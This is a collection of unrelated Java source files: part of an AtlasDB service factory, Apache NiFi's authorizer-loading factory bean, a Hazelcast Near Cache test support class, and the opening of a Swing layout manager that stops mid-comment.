private static <T> T createService(Optional<SSLSocketFactory> sslSocketFactory, Set<String> uris, Class<T> serviceClass) {
return AtlasDbHttpClients.createProxyWithFailover(sslSocketFactory, uris, serviceClass);
}
private static class ServiceCreator<T> implements Function<ServerListConfig, T> {
private Optional<SSLSocketFactory> sslSocketFactory;
private Class<T> serviceClass;
public ServiceCreator(Optional<SSLSocketFactory> sslSocketFactory, Class<T> serviceClass) {
this.sslSocketFactory = sslSocketFactory;
this.serviceClass = serviceClass;
}
@Override
public T apply(ServerListConfig input) {
return createService(sslSocketFactory, input.servers(), serviceClass);
}
}
@Value.Immutable
interface LockAndTimestampServices {
RemoteLockService lock();
TimestampService time();
}
public interface Environment {
void register(Object resource);
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.nifi.authorization;
import java.io.File;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBElement;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
import javax.xml.stream.XMLStreamReader;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.apache.commons.lang3.StringUtils;
import org.apache.nifi.authorization.annotation.AuthorizerContext;
import org.apache.nifi.authorization.exception.AuthorizationAccessException;
import org.apache.nifi.authorization.exception.AuthorizerCreationException;
import org.apache.nifi.authorization.exception.AuthorizerDestructionException;
import org.apache.nifi.authorization.generated.Authorizers;
import org.apache.nifi.authorization.generated.Property;
import org.apache.nifi.bundle.Bundle;
import org.apache.nifi.nar.ExtensionManager;
import org.apache.nifi.security.xml.XmlUtils;
import org.apache.nifi.util.NiFiProperties;
import org.apache.nifi.util.file.classloader.ClassLoaderUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.DisposableBean;
import org.springframework.beans.factory.FactoryBean;
import org.xml.sax.SAXException;
/**
* Factory bean for loading the configured authorizer.
*/
public class AuthorizerFactoryBean implements FactoryBean, DisposableBean, UserGroupProviderLookup, AccessPolicyProviderLookup, AuthorizerLookup {
private static final Logger logger = LoggerFactory.getLogger(AuthorizerFactoryBean.class);
private static final String AUTHORIZERS_XSD = "/authorizers.xsd";
private static final String JAXB_GENERATED_PATH = "org.apache.nifi.authorization.generated";
private static final JAXBContext JAXB_CONTEXT = initializeJaxbContext();
/**
* Load the JAXBContext.
*/
private static JAXBContext initializeJaxbContext() {
try {
return JAXBContext.newInstance(JAXB_GENERATED_PATH, AuthorizerFactoryBean.class.getClassLoader());
} catch (JAXBException e) {
throw new RuntimeException("Unable to create JAXBContext.");
}
}
private Authorizer authorizer;
private NiFiProperties properties;
private final Map<String, UserGroupProvider> userGroupProviders = new HashMap<>();
private final Map<String, AccessPolicyProvider> accessPolicyProviders = new HashMap<>();
private final Map<String, Authorizer> authorizers = new HashMap<>();
@Override
public UserGroupProvider getUserGroupProvider(String identifier) {
return userGroupProviders.get(identifier);
}
@Override
public AccessPolicyProvider getAccessPolicyProvider(String identifier) {
return accessPolicyProviders.get(identifier);
}
@Override
public Authorizer getAuthorizer(String identifier) {
return authorizers.get(identifier);
}
@Override
public Object getObject() throws Exception {
if (authorizer == null) {
if (properties.getSslPort() == null) {
// use a default authorizer... only allowable when running not securely
authorizer = createDefaultAuthorizer();
} else {
// look up the authorizer to use
final String authorizerIdentifier = properties.getProperty(NiFiProperties.SECURITY_USER_AUTHORIZER);
// ensure the authorizer class name was specified
if (StringUtils.isBlank(authorizerIdentifier)) {
throw new Exception("When running securely, the authorizer identifier must be specified in the nifi properties file.");
} else {
final Authorizers authorizerConfiguration = loadAuthorizersConfiguration();
// create each user group provider
for (final org.apache.nifi.authorization.generated.UserGroupProvider userGroupProvider : authorizerConfiguration.getUserGroupProvider()) {
userGroupProviders.put(userGroupProvider.getIdentifier(), createUserGroupProvider(userGroupProvider.getIdentifier(), userGroupProvider.getClazz()));
}
// configure each user group provider
for (final org.apache.nifi.authorization.generated.UserGroupProvider provider : authorizerConfiguration.getUserGroupProvider()) {
final UserGroupProvider instance = userGroupProviders.get(provider.getIdentifier());
instance.onConfigured(loadAuthorizerConfiguration(provider.getIdentifier(), provider.getProperty()));
}
// create each access policy provider
for (final org.apache.nifi.authorization.generated.AccessPolicyProvider accessPolicyProvider : authorizerConfiguration.getAccessPolicyProvider()) {
accessPolicyProviders.put(accessPolicyProvider.getIdentifier(), createAccessPolicyProvider(accessPolicyProvider.getIdentifier(), accessPolicyProvider.getClazz()));
}
// configure each access policy provider
for (final org.apache.nifi.authorization.generated.AccessPolicyProvider provider : authorizerConfiguration.getAccessPolicyProvider()) {
final AccessPolicyProvider instance = accessPolicyProviders.get(provider.getIdentifier());
instance.onConfigured(loadAuthorizerConfiguration(provider.getIdentifier(), provider.getProperty()));
}
// create each authorizer
for (final org.apache.nifi.authorization.generated.Authorizer authorizer : authorizerConfiguration.getAuthorizer()) {
authorizers.put(authorizer.getIdentifier(), createAuthorizer(authorizer.getIdentifier(), authorizer.getClazz(),authorizer.getClasspath()));
}
// configure each authorizer
for (final org.apache.nifi.authorization.generated.Authorizer provider : authorizerConfiguration.getAuthorizer()) {
final Authorizer instance = authorizers.get(provider.getIdentifier());
instance.onConfigured(loadAuthorizerConfiguration(provider.getIdentifier(), provider.getProperty()));
}
// get the authorizer instance
authorizer = getAuthorizer(authorizerIdentifier);
// ensure it was found
if (authorizer == null) {
throw new Exception(String.format("The specified authorizer '%s' could not be found.", authorizerIdentifier));
}
}
}
}
return authorizer;
}
private Authorizers loadAuthorizersConfiguration() throws Exception {
final File authorizersConfigurationFile = properties.getAuthorizerConfigurationFile();
// load the authorizers from the specified file
if (authorizersConfigurationFile.exists()) {
try {
// find the schema
final SchemaFactory schemaFactory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
final Schema schema = schemaFactory.newSchema(Authorizers.class.getResource(AUTHORIZERS_XSD));
// attempt to unmarshal
final XMLStreamReader xsr = XmlUtils.createSafeReader(new StreamSource(authorizersConfigurationFile));
final Unmarshaller unmarshaller = JAXB_CONTEXT.createUnmarshaller();
unmarshaller.setSchema(schema);
final JAXBElement<Authorizers> element = unmarshaller.unmarshal(xsr, Authorizers.class);
return element.getValue();
} catch (SAXException | JAXBException e) {
throw new Exception("Unable to load the authorizer configuration file at: " + authorizersConfigurationFile.getAbsolutePath(), e);
}
} else {
throw new Exception("Unable to find the authorizer configuration file at " + authorizersConfigurationFile.getAbsolutePath());
}
}
private UserGroupProvider createUserGroupProvider(final String identifier, final String userGroupProviderClassName) throws Exception {
// get the classloader for the specified user group provider
final List<Bundle> userGroupProviderBundles = ExtensionManager.getBundles(userGroupProviderClassName);
if (userGroupProviderBundles.size() == 0) {
throw new Exception(String.format("The specified user group provider class '%s' is not known to this nifi.", userGroupProviderClassName));
}
if (userGroupProviderBundles.size() > 1) {
throw new Exception(String.format("Multiple bundles found for the specified user group provider class '%s', only one is allowed.", userGroupProviderClassName));
}
final Bundle userGroupProviderBundle = userGroupProviderBundles.get(0);
final ClassLoader userGroupProviderClassLoader = userGroupProviderBundle.getClassLoader();
// get the current context classloader
final ClassLoader currentClassLoader = Thread.currentThread().getContextClassLoader();
final UserGroupProvider instance;
try {
// set the appropriate class loader
Thread.currentThread().setContextClassLoader(userGroupProviderClassLoader);
// attempt to load the class
Class<?> rawUserGroupProviderClass = Class.forName(userGroupProviderClassName, true, userGroupProviderClassLoader);
Class<? extends UserGroupProvider> userGroupProviderClass = rawUserGroupProviderClass.asSubclass(UserGroupProvider.class);
// otherwise create a new instance
Constructor constructor = userGroupProviderClass.getConstructor();
instance = (UserGroupProvider) constructor.newInstance();
// method injection
performMethodInjection(instance, userGroupProviderClass);
// field injection
performFieldInjection(instance, userGroupProviderClass);
// call post construction lifecycle event
instance.initialize(new StandardAuthorizerInitializationContext(identifier, this, this, this));
} finally {
if (currentClassLoader != null) {
Thread.currentThread().setContextClassLoader(currentClassLoader);
}
}
return UserGroupProviderFactory.withNarLoader(instance, userGroupProviderClassLoader);
}
private AccessPolicyProvider createAccessPolicyProvider(final String identifier, final String accessPolicyProviderClassName) throws Exception {
// get the classloader for the specified access policy provider
final List<Bundle> accessPolicyProviderBundles = ExtensionManager.getBundles(accessPolicyProviderClassName);
if (accessPolicyProviderBundles.size() == 0) {
throw new Exception(String.format("The specified access policy provider class '%s' is not known to this nifi.", accessPolicyProviderClassName));
}
if (accessPolicyProviderBundles.size() > 1) {
throw new Exception(String.format("Multiple bundles found for the specified access policy provider class '%s', only one is allowed.", accessPolicyProviderClassName));
}
final Bundle accessPolicyProviderBundle = accessPolicyProviderBundles.get(0);
final ClassLoader accessPolicyProviderClassLoader = accessPolicyProviderBundle.getClassLoader();
// get the current context classloader
final ClassLoader currentClassLoader = Thread.currentThread().getContextClassLoader();
final AccessPolicyProvider instance;
try {
// set the appropriate class loader
Thread.currentThread().setContextClassLoader(accessPolicyProviderClassLoader);
// attempt to load the class
Class<?> rawAccessPolicyProviderClass = Class.forName(accessPolicyProviderClassName, true, accessPolicyProviderClassLoader);
Class<? extends AccessPolicyProvider> accessPolicyClass = rawAccessPolicyProviderClass.asSubclass(AccessPolicyProvider.class);
// otherwise create a new instance
Constructor constructor = accessPolicyClass.getConstructor();
instance = (AccessPolicyProvider) constructor.newInstance();
// method injection
performMethodInjection(instance, accessPolicyClass);
// field injection
performFieldInjection(instance, accessPolicyClass);
// call post construction lifecycle event
instance.initialize(new StandardAuthorizerInitializationContext(identifier, this, this, this));
} finally {
if (currentClassLoader != null) {
Thread.currentThread().setContextClassLoader(currentClassLoader);
}
}
return AccessPolicyProviderFactory.withNarLoader(instance, accessPolicyProviderClassLoader);
}
private Authorizer createAuthorizer(final String identifier, final String authorizerClassName, final String classpathResources) throws Exception {
// get the classloader for the specified authorizer
final List<Bundle> authorizerBundles = ExtensionManager.getBundles(authorizerClassName);
if (authorizerBundles.size() == 0) {
throw new Exception(String.format("The specified authorizer class '%s' is not known to this nifi.", authorizerClassName));
}
if (authorizerBundles.size() > 1) {
throw new Exception(String.format("Multiple bundles found for the specified authorizer class '%s', only one is allowed.", authorizerClassName));
}
final Bundle authorizerBundle = authorizerBundles.get(0);
ClassLoader authorizerClassLoader = authorizerBundle.getClassLoader();
// get the current context classloader
final ClassLoader currentClassLoader = Thread.currentThread().getContextClassLoader();
final Authorizer instance;
try {
// set the appropriate class loader
Thread.currentThread().setContextClassLoader(authorizerClassLoader);
// attempt to load the class
Class<?> rawAuthorizerClass = Class.forName(authorizerClassName, true, authorizerClassLoader);
Class<? extends Authorizer> authorizerClass = rawAuthorizerClass.asSubclass(Authorizer.class);
// otherwise create a new instance
Constructor constructor = authorizerClass.getConstructor();
instance = (Authorizer) constructor.newInstance();
// method injection
performMethodInjection(instance, authorizerClass);
// field injection
performFieldInjection(instance, authorizerClass);
// call post construction lifecycle event
instance.initialize(new StandardAuthorizerInitializationContext(identifier, this, this, this));
} finally {
if (currentClassLoader != null) {
Thread.currentThread().setContextClassLoader(currentClassLoader);
}
}
if (StringUtils.isNotEmpty(classpathResources)) {
URL[] urls = ClassLoaderUtils.getURLsForClasspath(classpathResources, null, true);
authorizerClassLoader = new URLClassLoader(urls, authorizerClassLoader);
}
return AuthorizerFactory.installIntegrityChecks(AuthorizerFactory.withNarLoader(instance, authorizerClassLoader));
}
private AuthorizerConfigurationContext loadAuthorizerConfiguration(final String identifier, final List<Property> properties) {
final Map<String, String> authorizerProperties = new HashMap<>();
for (final Property property : properties) {
authorizerProperties.put(property.getName(), property.getValue());
}
return new StandardAuthorizerConfigurationContext(identifier, authorizerProperties);
}
private void performMethodInjection(final Object instance, final Class authorizerClass) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException {
for (final Method method : authorizerClass.getMethods()) {
if (method.isAnnotationPresent(AuthorizerContext.class)) {
// make the method accessible
final boolean isAccessible = method.isAccessible();
method.setAccessible(true);
try {
final Class<?>[] argumentTypes = method.getParameterTypes();
// look for setters (single argument)
if (argumentTypes.length == 1) {
final Class<?> argumentType = argumentTypes[0];
// look for well known types
if (NiFiProperties.class.isAssignableFrom(argumentType)) {
// nifi properties injection
method.invoke(instance, properties);
}
}
} finally {
method.setAccessible(isAccessible);
}
}
}
final Class parentClass = authorizerClass.getSuperclass();
if (parentClass != null && Authorizer.class.isAssignableFrom(parentClass)) {
performMethodInjection(instance, parentClass);
}
}
private void performFieldInjection(final Object instance, final Class authorizerClass) throws IllegalArgumentException, IllegalAccessException {
for (final Field field : authorizerClass.getDeclaredFields()) {
if (field.isAnnotationPresent(AuthorizerContext.class)) {
// make the method accessible
final boolean isAccessible = field.isAccessible();
field.setAccessible(true);
try {
// get the type
final Class<?> fieldType = field.getType();
// only consider this field if it isn't set yet
if (field.get(instance) == null) {
// look for well known types
if (NiFiProperties.class.isAssignableFrom(fieldType)) {
// nifi properties injection
field.set(instance, properties);
}
}
} finally {
field.setAccessible(isAccessible);
}
}
}
final Class parentClass = authorizerClass.getSuperclass();
if (parentClass != null && Authorizer.class.isAssignableFrom(parentClass)) {
performFieldInjection(instance, parentClass);
}
}
/**
* @return a default Authorizer to use when running unsecurely with no authorizer configured
*/
private Authorizer createDefaultAuthorizer() {
return new Authorizer() {
@Override
public AuthorizationResult authorize(final AuthorizationRequest request) throws AuthorizationAccessException {
return AuthorizationResult.approved();
}
@Override
public void initialize(AuthorizerInitializationContext initializationContext) throws AuthorizerCreationException {
}
@Override
public void onConfigured(AuthorizerConfigurationContext configurationContext) throws AuthorizerCreationException {
}
@Override
public void preDestruction() throws AuthorizerDestructionException {
}
};
}
@Override
public Class getObjectType() {
return Authorizer.class;
}
@Override
public boolean isSingleton() {
return true;
}
@Override
public void destroy() throws Exception {
if (authorizer != null) {
authorizer.preDestruction();
}
}
public void setProperties(NiFiProperties properties) {
this.properties = properties;
}
}
|
|
/*
* Copyright (c) 2008-2018, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.internal.nearcache;
import com.hazelcast.config.InMemoryFormat;
import com.hazelcast.config.NearCacheConfig;
import com.hazelcast.core.HazelcastInstance;
import com.hazelcast.internal.adapter.DataStructureAdapter;
import com.hazelcast.internal.nearcache.impl.invalidation.StaleReadDetector;
import com.hazelcast.monitor.NearCacheStats;
import com.hazelcast.monitor.impl.NearCacheStatsImpl;
import com.hazelcast.nio.serialization.Data;
import com.hazelcast.spi.ExecutionService;
import com.hazelcast.spi.serialization.SerializationService;
import com.hazelcast.test.AssertTask;
import org.junit.Before;
import java.util.HashMap;
import java.util.Map;
import static com.hazelcast.config.NearCacheConfig.DEFAULT_MEMORY_FORMAT;
import static com.hazelcast.internal.nearcache.NearCache.DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS;
import static com.hazelcast.internal.nearcache.NearCacheRecord.NOT_RESERVED;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
@SuppressWarnings("WeakerAccess")
public abstract class NearCacheTestSupport extends CommonNearCacheTestSupport {
protected SerializationService ss;
protected ExecutionService executionService;
@Before
public void setUp() throws Exception {
HazelcastInstance instance = createHazelcastInstance();
ss = getSerializationService(instance);
executionService = getNodeEngineImpl(instance).getExecutionService();
}
protected abstract NearCache<Integer, String> createNearCache(String name, NearCacheConfig nearCacheConfig,
ManagedNearCacheRecordStore nearCacheRecordStore);
protected NearCache<Integer, String> createNearCache(String name, ManagedNearCacheRecordStore nearCacheRecordStore) {
return createNearCache(name, createNearCacheConfig(name, DEFAULT_MEMORY_FORMAT), nearCacheRecordStore);
}
protected Map<Integer, String> generateRandomKeyValueMappings() {
Map<Integer, String> expectedKeyValueMappings = new HashMap<Integer, String>();
for (int i = 0; i < DEFAULT_RECORD_COUNT; i++) {
expectedKeyValueMappings.put(i, "Record-" + i);
}
return expectedKeyValueMappings;
}
protected ManagedNearCacheRecordStore createManagedNearCacheRecordStore(
Map<Integer, String> expectedKeyValueMappings) {
return new ManagedNearCacheRecordStore(expectedKeyValueMappings);
}
protected ManagedNearCacheRecordStore createManagedNearCacheRecordStore() {
return new ManagedNearCacheRecordStore(generateRandomKeyValueMappings());
}
protected void doGetNearCacheName() {
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, createManagedNearCacheRecordStore());
assertEquals(DEFAULT_NEAR_CACHE_NAME, nearCache.getName());
}
protected void doGetFromNearCache() {
Map<Integer, String> expectedKeyValueMappings = generateRandomKeyValueMappings();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates get call to wrapped NearCacheRecordStore
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
for (int i = 0; i < expectedKeyValueMappings.size(); i++) {
String value = nearCache.get(i);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnGet);
assertEquals(value, managedNearCacheRecordStore.latestValueOnGet);
}
}
protected void doPutToNearCache() {
Map<Integer, String> expectedKeyValueMappings = new HashMap<Integer, String>();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates put call to wrapped NearCacheRecordStore
for (int i = 0; i < DEFAULT_RECORD_COUNT; i++) {
String value = "Record-" + i;
nearCache.put(i, null, value);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnPut);
assertEquals(value, managedNearCacheRecordStore.latestValueOnPut);
}
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doRemoveFromNearCache() {
Map<Integer, String> expectedKeyValueMappings = generateRandomKeyValueMappings();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates remove call to wrapped NearCacheRecordStore
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
for (int i = 0; i < 2 * DEFAULT_RECORD_COUNT; i++) {
nearCache.remove(i);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnRemove);
assertEquals(i < DEFAULT_RECORD_COUNT, managedNearCacheRecordStore.latestResultOnRemove);
}
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doInvalidateFromNearCache() {
Map<Integer, String> expectedKeyValueMappings = generateRandomKeyValueMappings();
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore(expectedKeyValueMappings);
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache delegates invalidate call to wrapped NearCacheRecordStore
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
for (int i = 0; i < 2 * DEFAULT_RECORD_COUNT; i++) {
nearCache.invalidate(i);
assertEquals((Integer) i, managedNearCacheRecordStore.latestKeyOnRemove);
assertEquals(i < DEFAULT_RECORD_COUNT, managedNearCacheRecordStore.latestResultOnRemove);
}
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doClearNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
assertFalse(managedNearCacheRecordStore.clearCalled);
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
nearCache.clear();
// show that NearCache delegates clear call to wrapped NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.clearCalled);
assertEquals(nearCache.size(), managedNearCacheRecordStore.latestSize);
}
protected void doDestroyNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
assertFalse(managedNearCacheRecordStore.destroyCalled);
nearCache.destroy();
// show that NearCache delegates destroy call to wrapped NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.destroyCalled);
}
protected void doConfigureInMemoryFormatForNearCache() {
NearCacheConfig config1 = createNearCacheConfig(DEFAULT_NEAR_CACHE_NAME + "-1", DEFAULT_MEMORY_FORMAT);
NearCacheConfig config2 = createNearCacheConfig(DEFAULT_NEAR_CACHE_NAME + "-2", DEFAULT_MEMORY_FORMAT);
config1.setInMemoryFormat(InMemoryFormat.OBJECT);
config2.setInMemoryFormat(InMemoryFormat.BINARY);
NearCache nearCache1 = createNearCache(config1.getName(), config1, createManagedNearCacheRecordStore());
NearCache nearCache2 = createNearCache(config2.getName(), config2, createManagedNearCacheRecordStore());
// show that NearCache gets "inMemoryFormat" configuration from specified NearCacheConfig
assertEquals(InMemoryFormat.OBJECT, nearCache1.getInMemoryFormat());
assertEquals(InMemoryFormat.BINARY, nearCache2.getInMemoryFormat());
}
protected void doGetNearCacheStatsFromNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
// show that NearCache gets NearCacheStats from specified NearCacheRecordStore
assertEquals(managedNearCacheRecordStore.getNearCacheStats(), nearCache.getNearCacheStats());
}
protected void doSelectToSaveFromNearCache() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
Object selectedCandidate = nearCache.selectToSave();
// show that NearCache gets selected candidate from specified NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.selectToSaveCalled);
assertEquals(managedNearCacheRecordStore.selectedCandidateToSave, selectedCandidate);
}
protected void doCreateNearCacheAndWaitForExpirationCalled(boolean useTTL) {
final ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCacheConfig nearCacheConfig = createNearCacheConfig(DEFAULT_NEAR_CACHE_NAME, DEFAULT_MEMORY_FORMAT);
if (useTTL) {
nearCacheConfig.setTimeToLiveSeconds(DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS - 1);
} else {
nearCacheConfig.setMaxIdleSeconds(DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS - 1);
}
createNearCache(DEFAULT_NEAR_CACHE_NAME, nearCacheConfig, managedNearCacheRecordStore).initialize();
sleepSeconds(DEFAULT_EXPIRATION_TASK_INITIAL_DELAY_IN_SECONDS + 1);
// expiration will be called eventually
assertTrueEventually(new AssertTask() {
@Override
public void run() {
assertTrue(managedNearCacheRecordStore.doExpirationCalled);
}
});
}
protected void doPutToNearCacheStatsAndSeeEvictionCheckIsDone() {
ManagedNearCacheRecordStore managedNearCacheRecordStore = createManagedNearCacheRecordStore();
NearCache<Integer, String> nearCache = createNearCache(DEFAULT_NEAR_CACHE_NAME, managedNearCacheRecordStore);
nearCache.put(1, null, "1");
// show that NearCache checks eviction from specified NearCacheRecordStore
assertTrue(managedNearCacheRecordStore.doEvictionIfRequiredCalled);
}
protected class ManagedNearCacheRecordStore implements NearCacheRecordStore<Integer, String> {
protected final NearCacheStats nearCacheStats = new NearCacheStatsImpl();
protected final Object selectedCandidateToSave = new Object();
protected Map<Integer, String> expectedKeyValueMappings;
protected Integer latestKeyOnGet;
protected String latestValueOnGet;
protected Integer latestKeyOnPut;
protected String latestValueOnPut;
protected Integer latestKeyOnRemove;
protected int latestSize;
protected boolean latestResultOnRemove;
protected volatile boolean clearCalled;
protected volatile boolean destroyCalled;
protected volatile boolean selectToSaveCalled;
protected volatile boolean doEvictionIfRequiredCalled;
protected volatile boolean doExpirationCalled;
protected volatile StaleReadDetector staleReadDetector = StaleReadDetector.ALWAYS_FRESH;
protected ManagedNearCacheRecordStore(Map<Integer, String> expectedKeyValueMappings) {
this.expectedKeyValueMappings = expectedKeyValueMappings;
}
@Override
public void initialize() {
}
@Override
public String get(Integer key) {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
String value = expectedKeyValueMappings.get(key);
latestKeyOnGet = key;
latestValueOnGet = value;
return value;
}
@Override
public NearCacheRecord getRecord(Integer key) {
return null;
}
@Override
public void put(Integer key, Data keyData, String value) {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
expectedKeyValueMappings.put(key, value);
latestKeyOnPut = key;
latestValueOnPut = value;
}
@Override
public boolean remove(Integer key) {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
boolean result = expectedKeyValueMappings.remove(key) != null;
latestKeyOnRemove = key;
latestResultOnRemove = result;
return result;
}
@Override
public boolean invalidate(Integer key) {
return remove(key);
}
@Override
public void clear() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
expectedKeyValueMappings.clear();
clearCalled = true;
}
@Override
public void destroy() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
expectedKeyValueMappings.clear();
expectedKeyValueMappings = null;
destroyCalled = true;
}
@Override
public NearCacheStats getNearCacheStats() {
return nearCacheStats;
}
@Override
public Object selectToSave(Object... candidates) {
selectToSaveCalled = true;
return selectedCandidateToSave;
}
@Override
public int size() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
latestSize = expectedKeyValueMappings.size();
return latestSize;
}
@Override
public void doExpiration() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
doExpirationCalled = true;
}
@Override
public void doEvictionIfRequired() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
doEvictionIfRequiredCalled = true;
}
@Override
public void doEviction() {
if (expectedKeyValueMappings == null) {
throw new IllegalStateException("Near Cache is already destroyed");
}
}
@Override
public void storeKeys() {
}
@Override
public void loadKeys(DataStructureAdapter adapter) {
}
@Override
public void setStaleReadDetector(StaleReadDetector detector) {
staleReadDetector = detector;
}
@Override
public StaleReadDetector getStaleReadDetector() {
return staleReadDetector;
}
@Override
public long tryReserveForUpdate(Integer key, Data keyData) {
return NOT_RESERVED;
}
@Override
public String tryPublishReserved(Integer key, String value, long reservationId, boolean deserialize) {
return null;
}
}
}
|
|
package util.layouts;
import java.awt.Component;
import java.awt.Container;
import java.awt.Dimension;
import java.awt.LayoutManager;
import java.util.HashMap;
/**
* The {@link LayoutManager} for the Client.
* @author Haeldeus
* @version 1.0
*
*/
public class ClientLayout implements LayoutManager{
/**
* The String, that declares the Gaplist_Label, which displays {@code "Tracks in the
* Gaplist:"}.
*/
public static final String GAPLIST_LABEL = "Gaplist_Label";
/**
* The String, that declares the Wishlist_Label, which displays {@code "Tracks in the
* Wishlist:"}.
*/
public static final String WISHLIST_LABEL = "Wishlist_Label";
/**
* The String, that declares the Now_Playing_Label, which displays {@code "Now Playing:"}.
*/
public static final String NOW_PLAYING_LABEL = "Now_Playing_Label";
/**
* The String, that declares the Next_Track_Label, which displays {@code "Next Track:"}
*/
public static final String NEXT_TRACK_LABEL = "Next_Track_Label";
/**
* The String, that declares the Count_Gaplist_Label, which displays the current amount of
* Tracks in the Gaplist.
* @see windows.MainWindow#lblNoGaplist
*/
public static final String COUNT_GAPLIST_LABEL = "Count_Gaplist_Label";
/**
* The String, that declares the Count_Wishlist_Label, which displays the current amount of
* Track in the Wishlist.
* @see windows.MainWindow#lblNoWishlist
*/
public static final String COUNT_WISHLIST_LABEL = "Count_Wishlist_Label";
/**
* The String, that declares the Name_Now_Playing_Label, which displays the name of the
* current Track.
* @see windows.MainWindow#lblPlayingTrack
*/
public static final String NAME_NOW_PLAYING_LABEL = "Name_Now_Playing_Label";
/**
* The String, that declares the Name_Next_Track_Label, which displays the name of the
* next Track.
* @see windows.MainWindow#lblTrackNext
*/
public static final String NAME_NEXT_TRACK_LABEL = "Name_Next_Track_Label";
/**
* The String, that declares the Gaplist_Name_Label, which displays the Name of the current
* Gaplist.
* @see windows.MainWindow#lblGaplistName
*/
public static final String GAPLIST_NAME_LABEL = "Gaplist_Name_Label";
/**
* The String, that declares the Wishlist_Show_Label, which is the Header of the
* ScrollPane, that contains the Wishlist.
*/
public static final String WISHLIST_SHOW_LABEL = "Wishlist_Show_Label";
/**
* The String, that declares the Saved_Gaplist_Label, which is the Header of the
